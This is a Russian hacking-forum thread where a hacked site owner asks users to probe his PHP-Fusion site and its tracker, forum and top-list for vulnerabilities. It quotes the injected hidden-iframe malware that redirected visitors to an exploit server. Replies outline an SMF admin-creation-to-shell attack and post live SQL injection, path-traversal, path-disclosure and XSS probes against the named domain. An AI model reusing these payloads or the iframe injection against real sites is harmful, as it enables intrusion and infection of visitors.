Здравствуйте!

Кому не лень, проверьте на уязвимости мой сайт, вчера его хакнули, и я вот не знаю как, хакнули добавив через (скорее всего) SQL иньекцию новую панель с php кодом (а у меня код php может хранится в базе данных mysql) и был хакнут, но я обновил двиг и удалил ту панель, и теперь боюсь чтобы ещё раз не хакнули...

Сайт: http://alexalx-soft.com/
а также если будет не трудно проверте другие двиги на сайте:
Трекер: http://alexalx-soft.com/tracker/
Форум: http://forum.alexalx-soft.com/
Топ: http://top.alexalx-soft.com/

Спасибо за внимание!

вчера его хакнули, и я вот не знаю как
Логи посмотри и будешь знать как сломали.

Трекер: http://alexalx-soft.com/tracker/
Недавно тестил на локале этот двиг...ничего серьёзного.

Логи посмотри и будешь знать как сломали.

Недавно тестил на локале этот двиг...ничего серьёзного.
всё дело в том что я бесплатно на хостинге вишу, и нету такой функции, мне не выделяли, а выделять платно(
===
Значит этот двиг надёжный?

Возможно твой сайт был взломан не внешне, а локально. А с тобой по локалу хостится 308 сайтов. Попроси админа поставить права тебе на твою директорию, где лежит твой сайт. Но а возможно и бага есть....

Возможно твой сайт был взломан не внешне, а локально. А с тобой по локалу хостится 308 сайтов. Попроси админа поставить права тебе на твою директорию, где лежит твой сайт. Но а возможно и бага есть....Да, локально, скрипт с вирусом лежал на моёмже хостинге, ip одинаковые сайтов, и значит есть баг тогда.

PS а что просить админа то?

нельзя исключать еще варианты:угон твоего фтп акка, словил троя и т.д.

нельзя исключать еще варианты:угон твоего фтп акка, словил троя и т.д.Троя точно небыло... а вот насчёт ftp один вопрос:

если я поставил там в везде .ftpaccess и блокировать всех кроме моего ip (а он у меня постоянны) то это можно както обойти?

PS а что просить админа то?
Чтобы права поставил на веб директории поставил. Чтобы с левых сайтов залесть не могли, и прочитать файлы.

Троя точно небыло... а вот насчёт ftp один вопрос:

если я поставил там в везде .ftpaccess и блокировать всех кроме моего ip (а он у меня постоянны) то это можно както обойти?
да, если на тебе есть сокс/прокси =)

А форум у Вас патченый? Нсколько я помню в Smf 1.1.4 есть ряд ошибочек :) Вполне возможно поломали именно его, тем более, что под него есть паблик-сплоит, позволяющий добавлять юзеров в б/д форума. Добавляем своего админа, идем в админку форума, заливаем шелл, удаляем своего админа :) А вообще по логам можно точно сказать как Вас поломали. Достаточно поискать запросы с Union, Select или Insert (:

А форум у Вас патченый? Нсколько я помню в Smf 1.1.4 есть ряд ошибочек :) Вполне возможно поломали именно его, тем более, что под него есть паблик-сплоит, позволяющий добавлять юзеров в б/д форума. Добавляем своего админа, идем в админку форума, заливаем шелл, удаляем своего админа :) А вообще по логам можно точно сказать как Вас поломали. Достаточно поискать запросы с Union, Select или Insert (:
ссылку на сплоит плиз :)

А форум у Вас патченый? Нсколько я помню в Smf 1.1.4 есть ряд ошибочек :) Вполне возможно поломали именно его, тем более, что под него есть паблик-сплоит, позволяющий добавлять юзеров в б/д форума. Добавляем своего админа, идем в админку форума, заливаем шелл, удаляем своего админа :) А вообще по логам можно точно сказать как Вас поломали. Достаточно поискать запросы с Union, Select или Insert (:Нету логов... :( Форум то можно хакнуть тогда, только у меня была IPB но она была паленая, и на хосте забанили мой форум, пришлось SMF ставить... н оя в ней пока вообще не раздуплился да и както пашет - пусть пашет... прос токакойто двиг после IPB туповатый...

ссылку на сплоит плиз :)


http://forum.whack.ru/showthread.php?t=6171
Если еще актуально (:

http://forum.whack.ru/showthread.php?t=6171
Если еще актуально (:


у меня ссылу не открыл :)

По информации от хакера, как я получил, и...

В общем, сайт хакнул не по локали. Где то в скрипте есть дырка, какая и где я незнаю, но php-fusion.int.ru хакнут щас также как и мой сайт (ВНИМАНИЕ! НА САЙТЕ ВИРУС В IFLAME!)

В общем, вот как меня хакнули:

Создана новая панель:

echo("<iframe width='0' height='0' scrolling='no' noresize src='http://novor.info/iframe.php'>");

В этом файле:

<script>document.location.replace("http://58.65.234.105/cgi-bin/nsp15/in.cgi?p=spuser");</script>

А дальше сам эксплоит. По той ссылке IE получает эксплоит и вирус, а остальные браузеры -- просто редирект на google.com.

у меня ссылу не открыл :)
Forbidden
You don't have permission to access /showthread.php on this server


wtf?

http://www.php-fusion.co.uk/forum/viewthread.php?forum_id=38&thread_id=18898

перевёт как мог на англ и задал вопрос на офф сайте движка.

[pasкрытие путей]

http://alexalx-soft.com/infusions/pro_download_panel/download.php?catid[]=63

/usr/home/vshosts/hosts/u5034/alexalx-soft.com/www/maincore.php

http://alexalx-soft.com/infusions/shoutbox_panel/shoutbox_archive.php?rowstart=28888888888888888888 8888

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '288888888888888888888888,20' at line 3

file_exists() [function.file-exists]: open_basedir restriction in effect. File(themes/../../../../../../../../../../../etc/passwd%00/theme.php) is not within the allowed path(s): (/home/vshosts/hosts/u5034/alexalx-soft.com/:/usr/home/vshosts/hosts/u5034/alexalx-soft.com/:/virtual/vshosts/hosts/u5034/alexalx-soft.com/) in /usr/home/vshosts/hosts/u5034/alexalx-soft.com/www/maincore.php on line 196

несовсем понял возможен ли инклюд локальный (чет не до ковыряния сейчас, сплю почти) но раскрытие путей опять же, в пост-переменной user_theme при редактировании профиля (edit_profile.php)

[pasкрытие путей]



/usr/home/vshosts/hosts/u5034/alexalx-soft.com/www/maincore.php



You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '288888888888888888888888,20' at line 3Такс... Щас посмотрю что там... Спс...

несовсем понял возможен ли инклюд локальный (чет не до ковыряния сейчас, сплю почти) но раскрытие путей опять же, в пост-переменной user_theme при редактировании профиля (edit_profile.php)
чёт не понял...

Насчёт
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '288888888888888888888888,20' at line 3

Тоже не выхожит уже чёто (обновлял двиг)

а вот [pasкрытие путей] пашет...

скуль
POST /articles.php?cat_id=5 HTTP/1.1
Host: alexalx-soft.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

voteoption=1&voteoption=1&voteoption=1&voteoption=1&voteoption=1&voteoption="&poll_id=1&cast_vote=1
посли выполнения пишет
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\"=poll_votes_\"+1, poll_ips='|83.243.*.*' WHERE poll_id=1' at line 1

http://alexalx-soft.com/games/ - сам писал, можете потестировать, а то я могу дето и sql иньекцию случайно сделать...

xss

http://alexalx-soft.com/games/index.php?show=%C3'w%3Ciframe%20src=http://ha.ckers.org/scriptlet.html%20%3C


p.s. какой-то он у тебя тяжелый =\ /*трафик*/

xss

http://alexalx-soft.com/games/index.php?show=%C3'w%3Ciframe%20src=http://ha.ckers.org/scriptlet.html%20%3C


p.s. какой-то он у тебя тяжелый =\ /*трафик*/спасибо что нашёл и сказал)

http://alexalx-soft.com/games/ - проверте плиз, сделал полностью базу игр.